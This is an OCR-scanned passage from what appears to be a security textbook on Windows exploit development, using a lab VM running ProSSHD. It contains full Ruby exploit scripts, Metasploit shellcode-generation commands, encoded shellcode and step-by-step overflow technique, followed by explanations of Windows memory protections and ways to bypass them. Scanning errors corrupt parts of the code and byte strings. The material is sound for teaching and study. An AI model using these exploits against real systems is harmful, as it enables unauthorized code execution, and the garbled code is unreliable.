ble server but not attached yet), it is suggested that you save the state of the VMware 
virtual machine by saving a snapshot. After the snapshot is complete, you may return 
to this point by simply reverting to the snapshot. This trick will save you valuable test- 
ing time, as you may skip all of the previous setup and reboots on subsequent itera- 
tions of testing. 

Control eip 

Open up either a Metasploit Cygwin shell or a Ruby for Windows command shell and 
create a small Ruby script (prosshdl.rb) to verify the vulnerability of the server: 




NOTE The net-ssh and net-scp rubygems are required for this script. You 
can install them with gem install net-ssh and gem install net-scp. 



#prosshdl . rb 

# Based on original Exploit by S2 Crew [Hungary] 

# Special Thanks to Alexey Sintsov (dsecrg) for his example, advice, assistance 
%w{rubygems net/ssh net/scp} . each { |x| require x } 

username = 'testl' #need to set this up on the test victim machine (os account) 
password = 'testl' #need to set this up on the test victim machine 
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host = '10.10.10.143' 
port - 22 

# use A ' s to overwrite eip 
get_request = "\x41" * 500 

# let ' s do it . . . 

Net :: SSH. start ( host, username, rpassword => password) do|ssh| 
sleep (15) # gives us time to attach to wsshd.exe 

ssh . scp . download ! ( get_request, "foo.txt") # 2 params : remote file, local file 
end 



This script will be run from your attack host, pointed at the target (running in VMware). 

NOTE Remember to change the IP address to match your vulnerable server. 



It turns out in this case that the vulnerability exists in a child process, wsshd.exe, that 
only exists when there is an active connection to the server. So, we will need to launch 
the exploit, then quickly attach the debugger to continue our analysis. Inside the VM- 
ware machine, you may attach the debugger to the vulnerable program by choosing File | 
Attach. Select the wsshd.exe process and click the Attach button to start the debugger. 





NOTE It may be helpful to sort the Attach screen by the Name column to 
quickly find the process. 



Here it goes. . .launch the attack script, and then quickly switch to the VMware target 
and attach Immunity Debugger to wsshd.exe. 



ruby prosshdl.rb 




Once the debugger starts and loads the process, press f 9 to "continue" the debugger. 
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At this point, the exploit should be delivered and the lower-right corner of the de- 
bugger should turn yellow and say Paused. It is often useful to place your attack win- 
dow in a position that enables you to view the lower-right corner of the debugger to see 
when the debugger pauses. 

iii i 



|09:50 25) Access violation when executing 141414141] • use Sh4t*F7/F8/F9 to pass exception to program Pa r ed 



As you can see, we have controlled eip by overwriting it with 0x41414141. 



Determine the Offset(s) 

Revert to the snapshot of your virtual machine and resend a 500-byte pattern (gener- 
ated with Metasploit PatternCreate, as described in Chapter 11). Create a new copy of 
the attack script and change the get_request line as follows: 

# prosshd.2 
...truncated... 

# Use Metasploit pattern to determine offset: ruby . /patterncreate . rb 500 
get_request - 

"Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0AblAb2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0AclAc2Ac3Ac4Ac5Ac6 
Ac7Ac8Ac 9Ad0AdlAd2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0AelAe2Ae3Ae4Ae5Ae6Ae7Ae8Ae 9Af OAf lAf2Af 3A 
f 4Af 5Af 6Af 7Af 8Af 9Ag0AglAg2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0AhlAh2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai 
lAi2Ai3Ai4Ai5Ai 6Ai7Ai8Ai9Aj OAj lAj 2Aj 3Aj 4Aj 5Aj 6Aj 7Aj 8Aj 9Ak0AklAk2Ak3Ak4Ak5Ak6Ak7Ak8 
Ak 9A1 0 A1 1 A1 2 A1 3 A1 4 A1 5A1 6A1 7 A1 8 A1 9Am0AmlAm2Am3Am4Am5Am6Am7Am8Am9An0AnlAn2An3An4An5A 
n6An7An8An 9AoOAolAo2Ao3Ao4Ao5Ao 6Ao7Ao8Ao9Ap0AplAp2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0AqlAq2Aq 
3Aq4Aq5Aq" 

...truncated... 




NOTE The pattern string is a continuous line; page-width limitations on this 
page caused carriage returns. 



Let's run the new script. 
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This time, as expected, the debugger catches an exception and the value of eip con- 
tains the value of a portion of the pattern. Also, notice the extended stack pointer (esp) 
contains a portion of the pattern. 

Use the Metasploit pattern_offset.rb program (with the Metasploit Cygwin shell) 
to determine the offset of eip and esp. 

• /msf3/tools 

S . /patter n_off set. rb 41347141 500 

4 92 

jal len^WIN-IlMB04NI6RG /msf 3/tools 

5 . /patter n_off set. rb 71413S71 500 

496 




We can see that after 492 bytes of the buffer, we overwrite eip from bytes 493 to 496. 
Then, 4 bytes later, after byte 496, the rest of the buffer can be found at the top of the 
stack after the program crashes. The pattern_offset.rb tool shows the offset before the 
pattern starts. 

Determine the Attack Vector 

On Windows systems, the stack resides in the lower memory addresses. This presents a 
problem with the Aleph 1 attack technique we used in Linux exploits. Unlike the canned 
scenario of the meet.exe program, for real-world exploits, we cannot simply overwrite 
eip with a return address on the stack. The address will likely contain a 0x00 at the be- 
ginning and cause us problems as we pass that NULL byte to the vulnerable program. 

On Windows systems, you will have to find another attack vector. You will often 
find a portion, if not all, of your buffer in one of the registers when a Windows program 
crashes. As demonstrated in the preceding section, we control the area of the stack 
where the program crashes. All we need to do is place our shellcode beginning at byte 
497 and then overwrite eip with an opcode to "jmp esp" or "call esp" after the offset. 
We chose this attack vector because either of those opcodes will place the value of esp 
into eip and execute it. 

To find the address of that opcode, we need to search in either our vulnerable pro- 
gram or any module (DLL) that is dynamically linked to it. Remember, within Immu- 
nity Debugger, you can list the linked modules by pressing alt-e. As with all Windows 
applications, ntdll.dll is linked to our vulnerable application, so let's search for any 
"jmp esp" opcodes in that DLL using the Metasploit msfpescan tool (inside the Meta- 
sploit Cygwin shell). 



• / cyg d nve/c/Wi ndows/ system32 

I al 1 en<MrfIM-IlMB04NI6RG /cygdri ve/c/Vh ndows/syste 
S msfpescan -j esp ntdll.dll 

[ntdll.dll] 

Ox77f 11463 jmp esp 
Ox77f273cd jmp esp 
0x77f4d592 posh esp; retn 0x8b02 
0x77f4d77f posh esp; retn 0x8b02 
Ox77f68ae4 jmp esp 



i[^| , 



At this point, we will add another valuable tool to our toolbox. The pvefindaddr 
tool was developed by Peter Van Eeckhoutte (aka corelanc0d3r) of Corelan.be site and 
a link to it can be found in the "References" section. 
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This script is added to the pycommands folder within the Immunity Debugger in- 
stallation folder. Using this tool, you may automate many of the exploit development 
steps discussed in the rest of this chapter. You launch the tool by typing in the com- 
mand prompt at the bottom of Immunity Debugger. The output of this tool is pre- 
sented in the log screen of Immunity Debugger, accessed by choosing View | Log. You 
may run the tool with no options to see the help page in the log, as follows: 

! pvef indaddr 

In our case, we will use the pvefindaddr tool to find all jmp reg, call reg, and push 
reg/ret opcodes in the loaded modules. While attached to wsshd.exe, inside the com- 
mand prompt at the bottom of the Immunity Debugger screen, type the following: 

! pvefindaddr j -r esp -n 

The -r parameter indicates the register you want to jump to. The -n directive will 
make sure any pointers with a null byte are skipped. 

The tool will take a few seconds, perhaps longer, and then will provide output in 
the log that states that the actual results are written to a file called j.txt in the following 
folder: 

C : \Users\<your name here>\AppData\Local\VirtualStore\Program Files\Immunity 
Inc\ Immunity Debugger 

The abbreviated contents of that file are shown here (for wsshd.exe): 



Output generated by pvefindaddr vl.32 corelanc0d3r - 
http : / / www. corelan . be : 8800 



Loaded modules 

Fixup | Base I Top I Size I SafeSEH | ASLR | NXCompat | 

Modulename & Path 

NO | 0x70340000 | 0x70396000 | 0x00056000 | yes | NO | NO I 

MSVCR71.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll 

yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes I 

kernel32.dll : C:\Windows\system32\kernel32.dll 

yes | 0x76970000 | 0x76AlC000 | OxOOOACOOO | yes | yes | yes I 

msvcrt.dll : C:\Windows\system32\msvcrt.dll 

yes | 0x75AF0000 | 0x75AFC000 | 0x00000000 | NO I yes | yes I 

CRYPTBASE.dll : C:\Windows\system32\CRYPTBASE.dll 

yes | 0x77A50000 | 0x77B8C000 | 0x00130000 | yes | yes | yes I 

ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll 
ctruncated for brevity> 

NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO I 

wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe 
ctruncated for brevity> 

Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable] 

{ PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **] [Fixup: ** NO 
**] - C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll 

ctruncated for brevity> 

As you can see at the top of the report, many of the modules are ASLR protected. 

This will be fully described later; for now, suffice it to say that the base address of those 
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modules is changed on every reboot. The first column (Fixup) is also important. It in- 
dicates if a module is likely going to be rebased (which will make pointers from that 
module unreliable). Therefore, if we choose an offset from one of those modules (as 
with the previous ntdll.dll example), the exploit will only work on the system where 
the offset was found, and only until the next reboot. So, we will choose an offset from 
the MSVCR71.dll, which is not ASLR protected. Further down in the report, we see a 
push esp - ret opcode at 0x7c345c30; we will use that soon. 



Before crafting the exploit sandwich, we should determine the amount of buffer 
space available in which to place our shellcode. The easiest way to do this is to throw 
lots of A's at the program and manually inspect the stack after the program crashes. You 
can determine the depth of the buffer we control by clicking in the stack section of the 
debugger after the crash and then scrolling down to the bottom of the current stack 
frame and determining where the A's end. 

Create another copy of our attack script, change the following line to cleanly over- 
write eip with B's, and then add 2000 A's to the buffer to check space constraints: 

#prosshd3.rb ...truncated for brevity... 

get_request = "\x41" * 492 + "\x42\x42\x42\x42" + "\x41" * 2000 

After running the new attack script, we can check where the end of the buffer is on 
our stack. 



NOTE This attack vector will not always work for you. You will have to look 
at registers and work with what you’ve got. For example, you may have to 
“jmp eax” or“jmp esi.” 




After the program crashed, we clicked in the stack and scrolled down until we could 
see corruption in our A's. Making note of that address, 0x0012f758, and subtracting 
from that the address of the top of our stack (esp), we find there are 2,000 bytes of 
space on the stack that we control. Great! We won't need that much, but it is good to 
know how much is available. 
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We are ready to get some shellcode. Use the Metasploit command-line payload 
generator: 

$ msfpayload windows/exec cmd=calc.exe R | msfencode -b ' \xOO\xOa' -e 
x86/shikata_ga_nai -t ruby > sc.txt 

Copy and paste that shellcode into a test program (as shown in Chapter 11), com- 
pile it, and test it. 



NOTE You will not always have the space you need. Sometimes you will 
only have 4-10 bytes, followed by some important value in the way. Beyond 
that, you may have more space. When you encounter a situation like this, 
use a short jump such as “EB06,” which will jump 6 bytes forward. Since the 
operand is a signed number, you may jump 127 bytes in either direction using 
this trampoline technique. 



isual Studio Command Prompt (2010) 



\grayhat>cl shellcode.c 
Microsoft <R> 32-bit C/C++ Optimizing Compiler Ue 
Copyright <C> Microsoft Corporation. Oil rights 

shellcode.c 

Microsoft <R> Incremental Linker Uersion 10.00.3f 
Copyright <C> Microsoft Corporation. ft 11 rights 

/out :she llcode .exe 
she 11c ode .obj 

Ngrayhat >editbin /NXCOHPAT:NO shellcode.exe 
Microsoft <R> COFF/PF Editor Uersion 10.00. 30319. 
Copyright <C> Microsoft Corporation. ft 11 rights 



c : Ngrayhat >shellcodc . exe 
c : Ngrayhat > 



Calculator 
View Edit Help 



S3 



MC 


MR 


MS 


M* 


IH 


CE 


c 


± 


nr 


8 


9 


| / 


4 


5 


6 


* 


1 


2 


| 3 


- 


0 




+ 



V 

% 

V* 



IS 



Great! We have a working shellcode that pops up a calculator. 






Take the output of the preceding command and add it to the attack script (note that 
we will change the variable name from "buff" to "shell"). 

Build the Exploit Sandwich 

We are finally ready to put the parts together and build the exploit sandwich: 

# prosshd4.rb 

# Based on original Exploit by S2 Crew [Hungary] 

# Special Thanks to Alexey Sintsov (dsecrg) for his example, advice, assistance 
%w{rubygems net/ssh net/scp} . each { |x| reguire x } 
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username = ' testl ' 
password = 'testl' 

host = '10.10.10.143' 
port - 22 

# msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a' -e 
x86/shikata_ga_nai -t ruby 

# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=l) 
shell= 

" \xd9\xcc\x31\xc9\xbl\x33\xd9\x74 \x24\xf 4\x5b\xba\x99\xe4\x93" + 

" \x62\x31\x53\xl8\x03\x53\xl8\x83\xc3\x9d\x06\x66\x9e\x75\x4f " + 

"\x89\x5f \x85\x30\x03\xba\xb4\x62 \x77\xce\xe4\xb2\xf 3\x82\x04 " + 

"\x38\x51\x37\x9f \x4c\x7e\x38\x28 \xfa\x58\x77\xa9\xca\x64\xdb" + 

"\x69\x4c\xl 9\x26\xbd\xae\x20\xe9\xb0\xaf \x65\xl4\x3a\xfd\x3e" + 
"\x52\xe8\xl2\x4a\x26\x30\xl2\x9c\x2c\x08\x6c\x99\xf 3\xf c\xc6" + 
"\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37 \x94\x21" + 
"\xaa\xc3\x27\xe3\xe2\x2c\xl6\xcb\xa9\xl2\x96\xc6\xb0\x53\xll" + 

"\x38\xc7\xaf \x61\xc5\xd0\x6b\xlb\xll\x54\x6e\xbb\xd2 \xce\x4a" + 
"\x3d\x37\x88\xl9\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" + 
"\xd2\xe2\xca\x91\xf 6\xaf \x89\xb8 \xaf \xl5\x7c\xc4\xb0\xf 2\x21" + 
"\x60\xba\xll\x36\xl2\xel\x7f \xc9\x96\x9f \x39\xc9\xa8\x9f \x69" + 
"\xal\x99\xl4\xe6\xb6\x25\xf f \x42 \x48\x6c\xa2\xe3\xc0\x29\x36" + 
"\xb6\x8d\xc9\xec\xf 5\xab\x49\x05\x86\x48\x51\x6c\x83\xl5\xd5" + 

" \x9c\xf 9\x0 6\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x7 9\x2 9\xd7\x3b" + 

"\xlb\x35\xld" ; 

# Overwrite eip with "jmp esp" (0x7c345c30) of msvcr71.dll 

get_request = "\x41" * 492 + "\x30\x5C\x34\x7C" + "\x90" * 1000 + "\cc" + shell 

# lets do it . . . 

Net :: SSH. start ( host, username, : password => password) do|ssh| 
sleep (15) # gives us time to attach to wsshd.exe 

ssh . scp . download ! ( get_request, "foo.txt") # 2 params : remote file, local file 
end 




NOTE Sometimes the use of NOPs before the shellcode is a good idea.The 
Metasploit shellcode needs some space on the stack to decode itself when 
calling the GETPC routine. 

(FSTENV (28-BYTE) PTR SS:[ESP-C]) 



Also, if EIP and ESP are too close to each other (which is very common if the 
shellcode is on the stack), then NOPs are a good way to prevent corruption. 
But in that case, a simple stackadjust instruction might do the trick as well. 
Simply prepend the shellcode with the opcode bytes (for example, add 
esp, -450). The Metasploit assembler may be used to provide the required 
instructions in hex: 



root@bt : /pentest/ exploits/ framework3/ tools# . /metasm_shell . rb 

type "exit" or "quit" to quit 

use or "\n" for newline 

metasm > add esp, -450 

" \x81\xc4\x3e\xfe\xf f \xf f " 

metasm > 
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Debug the Exploit if Needed 

It's time to reset the virtual system and launch the preceding script. Remember to attach 
to wsshd.exe quickly and press f9 to run the program. After the initial exception, press 
f9 to continue to the debugger breakpoint. You should see the debugger pause because 
of the \xcc. 



BH12F36F CC 

mmm wcc 

HHI ?V\7V .1109 



I NT3 

FXCH SI <4> 
XOR FCX.FCX 



[1803:201 INT3 command at 0012F36F 



Paused 



After you press f9 to continue, you may see the program crash. 




If your program crashes, chances are you have a bad character in your shellcode. 
This happens from time to time as the vulnerable program (or client scp program in 
this case) may react to certain characters and may cause your exploit to abort or be oth- 
erwise modified. 

To find the bad character, you will need to look at the memory dump of the debug- 
ger and match that memory dump with the actual shellcode you sent across the net- 
work. To set up this inspection, you will need to revert to the virtual system and resend 
the attack script. After the initial exception, press f9 and let the program pause at the 
\xcc. At that point, right-click on the eip register and select Follow in Dump to view a 
hex memory dump of the shellcode. Then, you can lay that text window alongside the 
debugger and visually inspect for differences between what you sent and what resides 
in memory. 
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As you can see, in this case the byte just after OxAE, the 0x20 byte, was preceded by 
a new 0x5 C byte, probably added by the client. To test this theory, regenerate the shell- 
code and designate the 0x20 byte as a bad character: 
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$ msfpayload windows/exec cmd=calc.exe R | msfencode -b ' \x00\x0a\x20 ' -e 
x86/shikata_ga_nai -t ruby > sc.txt 

Modify the attack script with the new shellcode and repeat the debugging process 
until the exploit successfully completes and you can pop up the calculator. 




NOTE You may have to repeat this process of looking for bad characters 
many times until your code executes properly. In general, you will want to 
exclude all whitespace characters: 0x00, 0x20, 0x0a,0x0d, Ox I b, 0x0b, 0x0c 



When this works successfully in the debugger, you may remove the \xcc from your 
shellcode (best to just replace it with a \x90 to keep the current stack alignment) and 
try again. When everything works right, you may close the debugger and comment out 
the sleep command in our attack script. 




Success! We have demonstrated the Windows exploit development process on a real- 
world exploit. 




NOTE pvefindaddr provides a routine to easily compare shellcode in 
memory vs. shellcode written to a raw file. The pvefindaddr project wiki 
explains how to do this: http://redmine.corelan.be:8800/projects/pvefindaddr/ 
wiki/Pvefindaddr_usage (search for “compare”). 
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Understanding Structured Exception 
Handling (SEH) 

When programs crash, the operating system provides a mechanism to try to recover 
operations, called structured exception handling (SEH). This is often implemented in 
the source code with try/catch or try/exception blocks: 

int foo (void) { 

try { 

// An exception may occur here 

} 

except ( EXCEPT I ON_EXECUTE_HANDLER ) { 

// This handles the exception 

} 

return 0; 



Implementation of SEH 

Windows keeps track of the SEH records by using a special structure: 

_EXCEPTION_REGISTRATION struc 
prev dd ? 

handler dd ? 

_EXCEPTION_REGISTRATION ends 

The EXCEPTION_REGISTRATION structure is 8 bytes in size and contains two 
members: 

• prev Pointer to the next SEH record 

• handler Pointer to the actual handler code 

These records (exception frames) are stored on the stack at runtime and form a 
chain. The beginning of the chain is always placed in the first member of the Thread 
Information Block (TIB), which is stored on x86 machines in the FS: [0] register. As 
shown in Figure 15-2, the end of the chain is always the system default exception han- 
dler, and the prev pointer of that EXCEPTION_REGISTRATION record is always 
OxFFFFFFFF. 

When an exception is triggered, the operating system (ntdll.dll) places the follow- 
ing C++ function on the stack and calls it: 

EXCEPT ION^DIS POSIT ION 

cdecl _except_handler ( 

struct _EXCEPTION_RECORD *ExceptionRecord, 
void * EstablisherFrame, 
struct _CONTEXT *ContextRecord, 
void * DispatcherContext 
) ; 
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Figure 1 5-2 Structured exception handling (SEH) 

Prior to Windows XP SP1, the attacker could just overwrite one of the exception 
handlers on the stack and redirect control into the attacker's code (on the stack). How- 
ever, in Windows XP SP1, things were changed: 

• Registers are zeroed out, just prior to calling exception handlers. 

• Calls to exception handlers, located on the stack, are blocked. 

Later, in Visual C++ 2003, the SafeSEH protections were put in place. We will dis- 
cuss this protection and how to bypass it a bit later in the chapter. 

References 
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(Matt Pietrek) www.microsoft.com/msj/0197/exception/exception.aspx 
"Exploit Writing Tutorial Part 3: SEH Based Exploits" (Peter Van 
Eeckhoutte) www.corelan.be:8800/index.php/2009/07/25/ 
writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ 

SEH (Peter Kleissner) webl7.webbpro.de/index.php?page=windows-exception- 
handling 

"Structured Exception Handling" (Matt Miller, aka skape) 

uninformed. org/index.cgi?v=5&a=2&p=4 
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Understanding Windows Memory Protections 
(XP SP3, Vista, 7, and Server 2008) 

A complete discussion of Windows memory protections is beyond the scope of this 
book. We will cover only the highlights to give you a foundation for gray hat hacking. 
For comprehensive coverage of Windows memory protections, check out the articles in 
the "References" section. For the sake of space in this chapter, we will just cover the 
highlights. Throughout the rest of this chapter, we stand on the shoulders of David 
Litchfield, Matt Miller, and many others (see the "References" section). In particular, 
the work that Alex Sotirov and Mark Dowd have provided in this area is noteworthy. As 
shown in Figure 15-3, they have collected quite a bit of data on the Windows memory 
protections. 

As could be expected, over time, attackers learned how to take advantage of the lack 
of memory protections in previous versions of Windows. In response, around XP SP3, 
Microsoft started to add memory protections, which were quite effective for some time. 
Then, as could also be expected, the attackers eventually learned ways around them. 

Stack-Based Buffer Overrun Detection (/GS) 

The /GS compiler option is the Microsoft implementation of a stack canary concept, 
whereby a secret value is placed on the stack above the saved ebp and saved RETN ad- 
dress. Then, upon return of the function, the stack canary value is checked to see if it has 
been changed. This feature was introduced in Visual C++ 2003 and was initially turned 
off by default. 
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Figure 1 5-3 Windows memory protections (used with permission of Alex Sotirov and Mark Dowd) 
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The new function prolog looks like this: 

push ebp 
mov ebp, esp 

sub esp, 24h /space for local buffers and cookie 

move ax, dword ptr [vuln! security_cookie] 

xor eax, ebp ;xor cookie with ebp 

mov dword ptr [ebp-4], eax ; store it at the bottom of stack frame 

The new function epilog looks like this: 

mov ecx, dword ptr [ebp-4] 

xor ecx, ebp ; see if either cookie or ebp changed 

call vuln! security_check_cookie (004012e8) ; check it, address will vary 

leave 

ret 

So, as you can see, the security cookie is xor'ed with ebp and placed on the stack, 
just above saved ebp. Later, when the function returns, the security cookie is retrieved 
and xor'ed with ebp and then tested to see if it still matches the system value. This 
seems straightforward, but as we will show later, it is not sufficient. 

In Visual C++ 2005, Microsoft had the /GS protection turned on by default and 
added other features, such as moving the buffers to higher addresses in the stack frame, 
and moving the buffers below other sensitive variables and pointers so that a buffer 
overflow would have less local damage. 

It is important to know that the / GS feature is not always applied. For optimization 
reasons, there are some situations where the compiler option is not applied: 

• Functions that don't contain a buffer 

• Optimizations not enabled 

• Functions marked with the naked keyword (C++) 

• Functions containing inline assembly on the first line 

• Functions defined to have a variable argument list 

• Buffers less than 4 bytes in size 

In Visual C++ 2005 SP 1 , an additional feature was added to make the / GS heuristics 
more strict, so that more functions would be protected. This addition was prompted by 
a number of security vulnerabilities discovered on /GS-compiled code. To invoke this 
new feature, you include the following line of code: 

♦pragma strict_gs_check (on) 

Later, in Visual Studio 2008, a copy of the function arguments is moved to the top 
of the stack frame and retrieved at the return of a function, rendering the original 
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function arguments useless if overwritten. The following shows the evolution of the 
stack frame from 2003 to 2008. 



Visual C++ 2003 (without /GS) 
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Arguments 



Visual Studio 2008 (with /GS) 
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Safe Structured Exception Handling (SafeSEH) 

The purpose of the SafeSEH protection is to prevent the overwrite and use of SEH struc- 
tures stored on the stack. If a program is compiled and linked with the /SafeSEH linker 
option, the header of that binary will contain a table of all valid exception handlers; 
this table will be checked when an exception handler is called, to ensure that it is in the 
list. The check is done as part of the RtlDispatchException routine in ntdll.dll, which 
performs the following tests: 

• Ensure that the exception record is located on the stack of the current thread 

• Ensure that the handler pointer does not point back to the stack 

• Ensure that the handler is registered in the authorized list of handlers 

• Ensure that the handler is in an image of memory that is executable 

So, as you can see, the SafeSEH protection mechanism is quite effective to protect 
exception handlers, but as we will see in a bit, it is not foolproof. 

SEH Overwrite Protection (SEHOP) 

In Windows Server 2008, another protection mechanism was added, called SEH Overwrite 
Protection (SEHOP). SEHOP is implemented by the RtlDispatchException routine, which 
walks the exception handler chain and ensures it can reach the FinalExceptionHandler 
function in ntdll.dll. If an attacker overwrites an exception handler frame, then the 
chain will be broken and normally will not continue to the FinalExceptionHandler 
function. The key word here is "normally"; as was demonstrated by Stefan Le Berre and 
Damien Cauquil of Sysdream.com, this can be overcome by creating a fake exception 
frame that does point to the FinalExceptionHandler function of ntdll.dll. 

Heap Protections 

In the past, a traditional heap exploit would overwrite the heap chunk headers and at- 
tempt to create a fake chunk that would be used during the memory-free routine to 
write an arbitrary 4 bytes at any memory address. In Windows XP SP2 and beyond, 
Microsoft implemented a set of heap protections to prevent this type of attack: 
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• Safe unlinking Before unlinking, the operating system verifies that the 
forward and backward pointers point to the same chunk. 

• Heap metadata cookies One-byte cookies are stored in the heap chunk 
header and checked prior to unlinking from the free list. Later, in Windows 
Vista, XOR encryption was added to several key header fields and checked 
prior to use, to prevent tampering. 

Data Execution Prevention (DEP) 

Data Execution Prevention (DEP) is meant to prevent the execution of code placed in 
the heap, stack, or data sections of memory. This has long been a goal of operating 
systems, but until 2004, the hardware would not support it. In 2004, AMD came out 
with the NX bit in its CPU. This allowed, for the first time, the hardware to recognize 
the memory page as executable or not and act accordingly. Soon after, Intel came out 
with the XD feature, which did the same thing. 

Windows has been able to use the NX/XD bit since XP SP2. Applications may be 
linked with the /NXCOMPAT flag, which will enable hardware DEP. If the application 
is mn on a CPU that does not support the NX/XD bit, then Windows will revert to soft- 
ware DEP and will only provide checking when performing exception handling. 

Due to compatibility issues, DEP is not always enabled. The system administrator 
may choose from four possible DEP configurations: 

• Optln The default setting on Windows XP, Vista, and 7 systems. DEP 
protection is only enabled for applications that have explicitly opted in. DEP 
may be turned off at runtime by the application or loader. 

• OptOut The default setting for Windows Server 2003 and Server 2008. All 
processes are protected by DEP, except those placed on an exception list. DEP 
may be turned off at runtime by the application or loader. 

• AlwaysOn DEP is always on and cannot be disabled at runtime. 

• AlwaysOff DEP is always off and cannot be enabled at any time. 

The DEP settings for an application are stored in the Flags bitfield of the KPRO- 
CESS structure, in the kernel. There are eight flags in the bitfield, the first four of which 
are relevant to DEP. In particular, there is a Permanent flag that, when set, means 
that all DEP settings are final and cannot be changed. On Windows Vista, Windows 7, 
and Windows Server 2008, the Permanent flag is set for all binaries linked with 
the /NXCOMPAT flag. 

Address Space Layout Randomization (ASLR) 

The purpose of address space layout randomization (ASLR) is to introduce randomness 
(entropy) into the memory addresses used by a process. This makes attacking much 
more difficult, as memory addresses keep changing. Microsoft formally introduced 
ASLR in Windows Vista and subsequent operating systems. ASLR may be enabled 
system wide, disabled system wide, or used for applications that opt in using the 
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/DYNAMICBASE linker flag (this is the default behavior). The following memory base 
addresses are randomized: 

• Executable images (1 of 255 random positions) 

• DLL images (first ntdll.dll loaded in 1 of 256 random positions, then other 
DLLs randomly loaded next to it) 

• Stack (more random than other sections) 

• Heap (base heap structure is located in 1 of 32 random positions) 

• Process Environment Block (PEB)/Thread Environment Block (TEB) 

As can be seen in the preceding list, due to the 64KB page size limitation in Win- 
dows, some of the memory sections have less entropy when randomizing memory ad- 
dresses. This may be exploited by brute force. 

References 

"Bypassing Browser Memory Protections" (Alex Sotirov and Mark Dowd) 
taossa.com/archive/bh08sotirovdowd. pdf 

"Bypassing SEHOP" (Stefan Le Berre and Damien Cauquil) www.sysdream.com/ 
articles/ sehop_en.pdf 

"Improving Software Security Analysis Using Exploitation Properties" 

(Matt Miller, aka skape) www.uninformed.org/?v=9&a=4&t=txt 
"Inside Data Execution Prevention" (Snake, Snoop Security Researching 
Community) www.snoop-security.com/blog/index.php/2009/10/ 
inside-data-execution-prevention/ 

"Practical SEH Exploitation" 

freeworld.dic.org/down I oad.php?t=p&f=Practi cal -SEI I-exploitation.pdf 
"Windows ISV Software Security Defenses" (Michael Howard et al., 

Microsoft Corp.) msdn.microsoft.com/en-us/library/bb430720.aspx 



Bypassing Windows Memory Protections 

As alluded to already, as Microsoft improves the memory protection mechanisms in 
Windows, the attackers continue to find ways around them. We will start slow and then 
pick up other bypass methods as we go. At the end of this chapter, we will provide a 
chart that shows which bypass techniques to use for which protections. 




NOTE As of the time of this writing, a completely locked-down Windows 7 
box with all the protections in place is nearly impossible to exploit and there 
are no known public exploits. However, that will change over time and has 
already been completely compromised at least once by Peter Vreugdenhil (see 
the “References” section). 
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Bypassing / GS 

There are several ways to bypass the / GS protection mechanism, as described next. 

Guessing the Cookie Value 

This is not as crazy as it sounds. As discussed and demonstrated by skape (see the "Ref- 
erences" section), the /GS protection mechanism uses several weak entropy sources that 
may be calculated by an attacker and used to predict (or guess) the cookie value. This 
only works for local system attacks, where the attacker has access to the machine. 

Overwriting Calling Function Pointers 

When virtual functions are used, the objects or structures are placed on the stack by the 
calling function. If you can overwrite the vtable of the virtual function and create a fake 
vtable, you may redirect the virtual function and gain code execution. 

Replace the Cookie with One of Your Choosing 

The cookie is placed in the .data section of memory and is writable due to the need to 
calculate and write it into that location at runtime. If (and that is a big "if") you have 
arbitrary write access to memory (through another exploit, for example), you may over- 
write that value and then use the new value when overwriting the stack. 

Overwriting an SEH Record 

It turns out that the /GS protection does not protect the SEff structures placed on the 
stack. So, if you can write enough data to overwrite an SEH record and trigger an excep- 
tion prior to the function epilog and cookie check, you may control the flow of the 
program execution. Of course, Microsoft has implemented SafeSEH to protect the SEH 
record on the stack, but as we will see, it is vulnerable as well. One thing at a time; let's 
look at bypassing /GS using this method of bypassing SafeSEH. Later, when bypassing 
SEHOP, we will bypass the /GS protection at the same time. 

Bypassing SafeSEH 

As previously discussed, when an exception is triggered, the operating system places 
the except_handler function on the stack and calls it, as shown in the top half of Fig- 
ure 15-4. 

First, notice that when an exception is handled, the _EstablisherFrame pointer is 
stored at ESP+8. The _EstablisherFrame pointer actually points to the top of our excep- 
tion handler chain. Therefore, if we change the _next pointer of our overwritten excep- 
tion record to an assembly instruction, EB 06 90 90 (which will jump forward 6 bytes), 
and we change the .handler pointer to somewhere in a shared dll/exe, at a POP, POP, 
RETN sequence, we can redirect control of the program into our attacker code area of 
the stack. When the exception is handled by the operating system, the handler will be 
called, which will indeed pop 8 bytes off the stack and execute the instruction pointed 
to at ESP +8 (which is our IMP 06 command), and control will be redirected into the 
attacker code area of the stack, where shellcode may be placed. 
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ESP 



ESP+8 



Somewhere in dll/exe 
(without /SafeSEH) 



pop X 
pop X 
ret 



Stack 



Saved RET 



ExceptionRecord 



Established r ame 



ContextRecord 



DispatcherContext 



0x909006eb 



handler 



Attackers Code 



EXCEPTION_DISPOSITION cdecl _except_handler ( 

struct _EXCEPTION_RECORD *_ExceptionRecord, 
void * _EstablisherFrame, 
struct _CONTEXT *_ContextRecord, 
void * _DispatcherContext 

) ; 



Figure 1 5-4 Stack when handling exception 




NOTE In this case, we needed to jump forward only 6 bytes to clear the 
following address and the 2 bytes of the jump instruction. Sometimes, due to 
space constraints, a jump backward on the stack may be needed; in that case, 
a negative number may be used to jump backward — for example, EB FA FF FF 
will jump backward 6 bytes. 



Bypassing ASLR 

The easiest way to bypass ASLR is to return into modules that are not linked with ASLR 
protection. The pvefindaddr tool discussed earlier has an option to list all non-ASLR 
linked modules: 



! pvefindaddr noaslr 



